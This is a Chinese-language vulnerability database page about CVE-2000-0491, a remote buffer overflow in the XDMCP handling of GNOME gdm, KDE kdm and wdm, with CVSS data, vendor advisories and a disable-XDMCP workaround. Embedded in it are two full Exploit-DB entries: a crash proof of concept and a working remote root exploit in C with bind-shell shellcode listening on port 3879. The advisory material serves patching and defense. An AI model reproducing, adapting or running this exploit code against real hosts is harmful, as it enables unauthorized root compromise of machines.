CVE-2000-0491
CVSS10.0
发布时间 :2000-05-24 00:00:00
修订时间 :2008-09-10 15:04:48
NMCOES    

[原文]Buffer overflow in the XDMCP parsing code of GNOME gdm, KDE kdm, and wdm allows remote attackers to execute arbitrary commands or cause a denial of service via a long FORWARD_QUERY request.


[CNNVD]GNOME gdm XDMCP缓冲区溢出漏洞(CNNVD-200005-086)

        GNOME gdm,KDE kdm和wdm 的XDMCP解析代码存在缓冲区溢出漏洞。远程攻击者借助超长FORWARD_QUERY请求可以执行任意命令或导致拒绝服务。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:suse:suse_linux:6.2SuSE SuSE Linux 6.2
cpe:/o:caldera:openlinux
cpe:/a:gnome:gdm:1.0
cpe:/o:suse:suse_linux:6.4SuSE SuSE Linux 6.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0491
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0491
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200005-086
(官方数据源) CNNVD

- 其它链接及资源

ftp://ftp.calderasystems.com/pub/OpenLinux/security/CSSA-2000-013.0.txt
(VENDOR_ADVISORY)  CALDERA  CSSA-2000-013.0
http://www.securityfocus.com/bid/1370
(UNKNOWN)  BID  1370
http://www.securityfocus.com/bid/1279
(UNKNOWN)  BID  1279
http://www.securityfocus.com/bid/1233
(UNKNOWN)  BID  1233
http://www.novell.com/linux/security/advisories/suse_security_announce_49.html
(UNKNOWN)  SUSE  20000524 Security hole in gdm <= 2.0beta4-25
http://archives.neohapsis.com/archives/bugtraq/2000-06/0025.html
(UNKNOWN)  BUGTRAQ  20000607 Conectiva Linux Security Announcement - gdm
http://archives.neohapsis.com/archives/bugtraq/2000-05/0241.html
(UNKNOWN)  BUGTRAQ  20000521 "gdm" remote hole

- 漏洞信息

GNOME gdm XDMCP缓冲区溢出漏洞
危急 缓冲区溢出
2000-05-24 00:00:00 2005-10-20 00:00:00
远程  
        GNOME gdm,KDE kdm和wdm 的XDMCP解析代码存在缓冲区溢出漏洞。远程攻击者借助超长FORWARD_QUERY请求可以执行任意命令或导致拒绝服务。

- 公告与补丁

        Changing the contents of the 'Enable' variable to 0 in the gdm configuration file (often /etc/X11/gdm/gdm.conf) will eliminate this vulnerability.
        Update available:

- 漏洞信息 (19947)

gdm 1.0 .x/2.0 .x BETA/2.2 .0 XDMCP Buffer Overflow Vulnerability (1) (EDBID:19947)
linux remote
2000-05-22 Verified
0 Chris Evans
N/A [点击下载]
source: http://www.securityfocus.com/bid/1233/info

A buffer overrun exists in the XDMCP handling code used in 'gdm', an xdm replacement, shipped as part of the GNOME desktop. By sending a maliciously crafted XDMCP message, it is possible for a remote attacker to execute arbitrary commands as root on the susceptible machine. The problem lies in the handling of the display information sent as part of an XDMCP 'FORWARD_QUERY' request.

By default, gdm is not configured to listen via XDMCP. The versions of gdm shipped with RedHat 6.0-6.2, Helix GNOME and gdm built from source are not vulnerable unless they were configured to accept XDMCP requests. This is configured via the /etc/X11/gdm/gdm.conf on some systems, although this file may vary. If the "Enable" variable is set to 0, you are not susceptible. 

/*    
 * breakgdm.c - Chris Evans
 */
   
#include <unistd.h>
#include <string.h>
#include <netinet/in.h>

int
main(int argc, const char* argv[])
{
  char deathbuf[1000];
  unsigned short s;   
  unsigned char c;    
  
  memset(deathbuf, 'A', sizeof(deathbuf));
  
  /* Write the Xdmcp header */
  /* Version */
  s = htons(1);
  write(1, &s, 2);
  /* Opcode: FORWARD_QUERY */
  s = htons(4);
  write(1, &s, 2);
  /* Length */    
  s = htons(1 + 2 + 1000 + 2);
  write(1, &s, 2);
  
  /* Now we're into FORWARD_QUERY which consists of
   * remote display, remote port, auth info. Remote display is binary
   * IP address data....
   */
  /* Remote display: 1000 A's which incidentally smoke a path
   * right to the stack
   */
  s = htons(sizeof(deathbuf));
  write(1, &s, 2);
  write(1, deathbuf, sizeof(deathbuf));
  /* Display port.. empty data will do */
  s = htons(0);
  write(1, &s, 2);
  /* Auth list.. empty data will do */
  c = 0;
  write(1, &c, 1);
} 
		

- 漏洞信息 (19948)

gdm 1.0 .x/2.0 .x BETA/2.2 .0 XDMCP Buffer Overflow Vulnerability (2) (EDBID:19948)
linux remote
2000-05-22 Verified
0 AbraxaS
N/A [点击下载]
source: http://www.securityfocus.com/bid/1233/info
 
A buffer overrun exists in the XDMCP handling code used in 'gdm', an xdm replacement, shipped as part of the GNOME desktop. By sending a maliciously crafted XDMCP message, it is possible for a remote attacker to execute arbitrary commands as root on the susceptible machine. The problem lies in the handling of the display information sent as part of an XDMCP 'FORWARD_QUERY' request.
 
By default, gdm is not configured to listen via XDMCP. The versions of gdm shipped with RedHat 6.0-6.2, Helix GNOME and gdm built from source are not vulnerable unless they were configured to accept XDMCP requests. This is configured via the /etc/X11/gdm/gdm.conf on some systems, although this file may vary. If the "Enable" variable is set to 0, you are not susceptible. 

/*
 *             gdm (xdmcp) exploit
 *         written 05/2000 by AbraxaS
 *
 *     abraxas@sekure.de && www.sekure.de
 *
 *
 * Tested on:  SuSE 6.2 / gdm-2.0beta1-4,
 *           RedHat 6.2 / gdm-2.0beta2
 *
 * Offsets: Worked with offsets between 0 and 300
 *
 * Usage: gdmexpl [target] [offset]
 *
 * Note: Just a proof of concept.
 *
 * Greetings to: dies, grue, lamagra & (silly) peak
 */


#include <stdio.h>
#include <strings.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>

#define NOP 0x90

/* lammys bind shell code / binds a shell to port 3879 */
char code[]=
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";


int resolve (char *denise)
{
  struct hostent *info;
  unsigned long ip;

  if ((ip=inet_addr(denise))==-1)
  {
    if ((info=gethostbyname(denise))==0)
    {
      printf("Couldn't resolve [%s]\n", denise);
      exit(0);
    }
    memcpy(&ip, (info->h_addr), 4);
  }
  return (ip);
}


int main (int argc, char **argv)
{
  char uhm;
  int nadine;
  short blah[6];
  char buffy[1400]; /* you might make this buffer bigger to increase the
                       probability to hit the right addy. making the
                       buffer too big could destroy the code though */
  unsigned long addy;
  struct sockaddr_in stephanie;
  char big_buffy[sizeof(buffy)+12];

  if (argc < 3)
  {
    printf("\nGDM 2.0betaX exploit by AbraxaS (abraxas@sekure.de)"
           "\nUsage: %s [target] [offset]\n", argv[0]);
    exit(0);
  }

  addy = 0xbffff8c0-atoi(argv[2]);

  stephanie.sin_family = AF_INET;
  stephanie.sin_port = htons (177);
  stephanie.sin_addr.s_addr = resolve(argv[1]);
  nadine = socket (AF_INET, SOCK_DGRAM, 0);

  if (connect(nadine,(struct sockaddr *)&stephanie,sizeof(struct
sockaddr))<0)
  {
    perror("Connect"); exit(0);
  }

  /* filling buffer.buffy with NOPs */
  memset(buffy, NOP, sizeof(buffy));
  /* cleaning buffer.big_buffy */
  bzero(big_buffy, sizeof(big_buffy));

  /*
   *   creating XDMCP header
   */

  /* XDM_PROTOCOL_VERSION */
  blah[0] = htons(1);
  /* opcode "FORWARD_QUERY" */
  blah[1] = htons(4);
  /* length (checksum)*/
  blah[2] = htons(5+sizeof(buffy)); /* see checksum algorithm */
  /* length of display buffer */
  blah[3] = htons(sizeof(buffy));
  /* display port */
  blah[4] = htons(0);
  /* authlist */
  blah[5] = htons(0);

  *(short *)&big_buffy[0]=blah[0];
  *(short *)&big_buffy[2]=blah[1];
  *(short *)&big_buffy[4]=blah[2];
  *(short *)&big_buffy[6]=blah[3];
  *(short *)&big_buffy[sizeof(buffy)+8]=blah[4];
  *(short *)&big_buffy[sizeof(buffy)+10]=blah[5];


  /* writing shellcode */
  memcpy(buffy+sizeof(buffy)-strlen(code), code, strlen(code));

  /* fixing some stuff */
  *(long *)&buffy[0] = 0x0100007f; /* source address, not neccessary */
  *(long *)&buffy[4] = 0x00000000; /* cleaning clnt_authlist */
  *(long *)&buffy[8] = 0x00000000;

  /* writing own RET address */
  *(long *)&buffy[32]=addy;

  /* copying buffy into big_buffy */
  memcpy(big_buffy+8, buffy, sizeof(buffy));

  /* sending big_buffy */
  write(nadine, big_buffy, sizeof(big_buffy));

  printf("\nConnect to %s, port 3879 now.", argv[1]);
  printf("\nBut behave :) --abraxas\n");

  close(nadine);

}

		

- 漏洞信息

11754
GNOME Display Manager (gdm) XDMCP FORWARD_QUERY Request Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Third-Party Solution
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2000-05-21 Unknow
Unknow Unknow

- 解决方案

Multiple Linux vendors have released upgraded versions of the package which address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

XFree86 xdm Buffer Overflow Vulnerability
Boundary Condition Error 1370
Yes No
2000-06-19 12:00:00 2009-07-11 02:56:00
This vulnerability was posted to the Bugtraq mailing list on June 19, 2000 by Chris Evans <chris@ferret.lmh.ox.ac.uk>

- 受影响的程序版本

XFree86 X11R6 4.0.3
+ RedHat Linux 7.1
XFree86 X11R6 4.0.1
+ RedHat Linux 7.0
XFree86 X11R6 4.0
XFree86 X11R6 3.3.6
+ Debian Linux 2.2
+ Red Hat Linux 6.2
XFree86 X11R6 3.3.5
- RedHat Linux 6.1 i386
XFree86 X11R6 3.3.4
XFree86 X11R6 3.3.3
Wings wdm 1.2
KDE KDE 2.0 BETA
KDE KDE 1.2
- S.u.S.E. Linux 6.4
KDE KDE 1.1.2
+ Caldera OpenLinux 2.3
+ Mandriva Linux Mandrake 7.0
KDE KDE 1.1.1
KDE KDE 1.1

- 漏洞讨论

Xdm is the X11 display manager, used for managing X11 user sessions. The XFree86 implementation of xdm (and derivatives such as kdm) contains a possibly exploitable buffer overflow condition.

The overflow is believed to exist when a remote Xserver is attempting to begin an xdm session via XDMCP. Successful exploitation of this vulnerability may provide an attacker with root access on the target host.

Though uncomfirmed, it is most likely required that the attacking host be authorized to connect and listed in the Xaccess file.

- 漏洞利用

Currently the SecurityFocus staff are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 解决方案

Disabling XDMCP listening may eliminate this vulnerability.

Debian has released fixed packages.

Red Hat has released upgraded packages which correct this vulnerability.

Currently the SecurityFocus staff are not aware of any other vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.


XFree86 X11R6 3.3.6

XFree86 X11R6 4.0.1

XFree86 X11R6 4.0.3

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站